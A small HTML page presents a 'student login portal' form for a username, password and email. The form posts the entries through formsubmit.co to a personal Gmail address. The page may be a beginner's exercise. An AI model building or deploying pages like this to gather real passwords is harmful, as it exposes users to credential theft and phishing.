<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body align="center">
    <form action="https://formsubmit.co/karnakarmarati2002@gmail.com" method="POST">
    <h1>student login portal</h1>
    <label for="name">username</label>
    <input type="text" id="name" name="username" placeholder="enter username" required><br><br>
    <label for="name">password</label>
    <input type="password" id="name" name="password" placeholder="enter password" required><br><br>
    <label for="na">email</label>
    <input type="email" name="email" placeholder="enter mail"><br><br>
    <textarea placeholder="any suggestion" required></textarea><br><br>
    <input type="submit" >
</form>
   
    
</body>
</html>